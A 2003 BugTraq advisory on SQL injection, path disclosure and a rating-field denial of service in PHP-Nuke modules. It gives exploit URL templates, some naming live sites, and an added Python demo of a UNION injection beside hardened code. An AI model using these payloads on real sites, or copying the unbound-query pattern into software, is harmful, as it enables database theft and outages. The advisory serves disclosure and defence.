BugTraq
PHP-Nuke Denial of Service attack and more SQL Injections May 18 2003 10:01AM
Lorenzo Manuel Hernandez Garcia-Hierro (security lorenzohgh com)


-------

Product: PHP-Nuke

Vendor: Francisco Burzi

Versions Vulnerable:

Francisco Burzi PHP-Nuke 6.0

Francisco Burzi PHP-Nuke 6.5 RC3

Francisco Burzi PHP-Nuke 6.5 RC2

Francisco Burzi PHP-Nuke 6.5 RC1

Francisco Burzi PHP-Nuke 6.5 FINAL

Francisco Burzi PHP-Nuke 6.5 BETA 1

Francisco Burzi PHP-Nuke 6.5

6.5 with all patches

6.0 with all patches

5.5 with all patches

Not vulnerable:

unknown

------

DESCRIPTION:

------

New SQL injections and path disclosures in the main modules.

Note the final backtick (`) in each exploit URL: the other published SQL injections don't use it, but it is very important for making the query succeed here.

--------

FOUND VULNERABLE MODULES:

--------

--------

- SECTIONS (NEW)

--------

Type: SQL Injection and Path Disclosure

*********

Exploit:

http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=printpage&artid=`[YOUR QUERY] (NEW)

--------

- AVANTGO

--------

Type: SQL Injection and Path disclosure. (NEW)

*********

Exploit:

http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]

--------

- SURVEYS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:

http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]

-

http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0

--------

- DOWNLOADS

--------

Type: SQL Injection and Path disclosure. (NEW)

********

Exploit:

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]

-

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD

-------------

NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)

-------------

I found a possible denial of service attack in the Downloads module through the rating system.

Exploit:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999

When the file is rated with this value it ends up with a rating of 238,609,298.89. The same input can be used to make a denial of service attack against the MySQL server, or to send a very long buffer (a possible buffer overflow or stack crash). The MySQL server stores this odd value because the query fails with an error (more characters in the field than the allowed number); if the buffer sent is longer than the server allows or accepts, the server becomes unstable and the system can crash.

Exploit for SQL Injection and Denial of Service attack:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

--------

- REVIEWS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:

http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]

--------

- WEB_LINKS

--------

Type: SQL Injection (NEW) and Path disclosure.(NEW)

********

Exploit:

http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]

-

http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num

- The Web_Links module is affected by the same possible DoS attack I discovered in Downloads, and by the SQL injections and buffer overflows:

Exploit:

http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]

[DATA] = the data to send (the rating points and the field buffer, of course).

--------

SOLUTION:

--------

- Deactivate the affected modules entirely.

- A temporary workaround for the path disclosure is to turn off error reporting to the browser in php.ini (display_errors = Off). This hides the paths but does not fix the injections, so it is a WORKAROUND, not a solution.
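The pattern behind every entry above, and the fix that the SOLUTION section only hints at, as an added example that is not PHP-Nuke's own code: a Python/sqlite3 re-creation of an integer URL parameter (artid, rating) dropped into SQL unquoted, so that a lone backtick breaks the statement (the path-disclosing error) and a UNION reads another table, beside a hardened handler that whitelists the parameter's shape, range-checks the rating and binds the values. sqlite3 stands in for MySQL; the table and column names, the leaked path string, MAX_RATING and the sample rows are all constructed assumptions, not PHP-Nuke's real schema.

```python
"""Added example (not PHP-Nuke's own code): a Python/sqlite3 re-creation of the
query pattern this advisory exploits, an integer URL parameter dropped into SQL
unquoted, next to a hardened handler.  Table and column names are assumptions
loosely modelled on PHP-Nuke's schema and the sample rows are constructed."""
import re
import sqlite3

MAX_RATING = 10  # assumed upper bound of the rating form's dropdown


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one public article, one admin row, one download."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE nuke_seccont (artid INTEGER, secid INTEGER, title TEXT, content TEXT);
        INSERT INTO nuke_seccont VALUES (1, 1, 'Hello', 'public article');
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT);
        INSERT INTO nuke_authors VALUES ('God', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE nuke_downloads (lid INTEGER, totalvotes INTEGER, rating REAL);
        INSERT INTO nuke_downloads VALUES (96, 1, 7.0);
    """)
    return db


class PathDisclosure(Exception):
    """Stands in for the PHP warning that, with display_errors on, prints the
    script's full filesystem path to the browser when the query fails."""


def viewarticle_vulnerable(db, artid):
    # The advisory's pattern: $artid goes into the statement unquoted, so there is
    # no closing quote to worry about and everything after the digits is SQL.
    sql = f"SELECT title, content FROM nuke_seccont WHERE artid={artid}"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        # A lone backtick is enough to make the parser choke; that error text is
        # the "path disclosure" the advisory lists beside every injection.
        # The path below is an assumed placeholder.
        raise PathDisclosure(f"{err} in /path/to/modules/Sections/index.php")


def viewarticle_hardened(db, artid):
    # Accept only a plain decimal integer, then bind it instead of interpolating.
    if not re.fullmatch(r"[0-9]+", artid):
        raise ValueError("artid must be an integer")
    return db.execute("SELECT title, content FROM nuke_seccont WHERE artid=?",
                      (int(artid),)).fetchall()


def rate_vulnerable(db, lid, rating):
    # The rating DoS: neither lid nor rating is range-checked or bound, so the
    # running average is recomputed from whatever number (or SQL) arrives.
    # SQLite evaluates every SET expression against the old row, so totalvotes
    # in the average is the pre-vote count; MySQL's UPDATE semantics differ, but
    # the point, an unbounded attacker-chosen number reaching the column, is the same.
    db.execute(f"UPDATE nuke_downloads SET "
               f"rating=(rating*totalvotes+{rating})/(totalvotes+1), "
               f"totalvotes=totalvotes+1 WHERE lid={lid}")
    return db.execute(f"SELECT rating FROM nuke_downloads WHERE lid={lid}").fetchone()[0]


def rate_hardened(db, lid, rating):
    # Whitelist the shape of both parameters, enforce the form's range, bind them.
    if not re.fullmatch(r"[0-9]+", lid) or not re.fullmatch(r"[0-9]{1,2}", rating):
        raise ValueError("lid and rating must be short integers")
    score = int(rating)
    if not 1 <= score <= MAX_RATING:
        raise ValueError("rating out of range")
    db.execute("UPDATE nuke_downloads SET "
               "rating=(rating*totalvotes+?)/(totalvotes+1), "
               "totalvotes=totalvotes+1 WHERE lid=?", (score, int(lid)))
    return db.execute("SELECT rating FROM nuke_downloads WHERE lid=?",
                      (int(lid),)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(viewarticle_vulnerable(db, "1"))                    # normal request
    print(viewarticle_vulnerable(db, "0 UNION SELECT aid, pwd FROM nuke_authors"))
    try:
        viewarticle_vulnerable(db, "`")                        # the advisory's lone backtick
    except PathDisclosure as err:
        print("leaked:", err)
    print(rate_vulnerable(make_db(), "96", "9" * 71))          # absurd average
    print(rate_hardened(make_db(), "96", "9"))                 # (7*1+9)/2 = 8.0
```

The hardened handlers reject the backtick, the UNION and the 71-digit rating before any SQL is built, which is the check the advisory's "deactivate the module" advice works around; turning display_errors off only hides the path in the error message and leaves the queries themselves exploitable.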

-----

WHAT CAN HAPPEN? AND NOTES

-----

Gaining access to the PHP-Nuke database, changing content, gaining access to private information, revealing server paths; MySQL server buffer overflow, MySQL server crash, server crash.

-NOTES-

I tested it on phpnuke-espanol.org and it is vulnerable to all of them.

I tested it on phpnuke.org and it is vulnerable in the active modules affected by this (Downloads, Surveys) (some errors are not reported because php.ini is configured for this, but the vulnerabilities are present).

-----

CONTACT INFO :

---------------------------------------

Lorenzo Manuel Hernandez Garcia-Hierro

--- Computer Security Analyzer ---

--www.novappc.com --

PGP: Keyfingerprint

B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2

ID: 0x9C38E1D7

**********************************
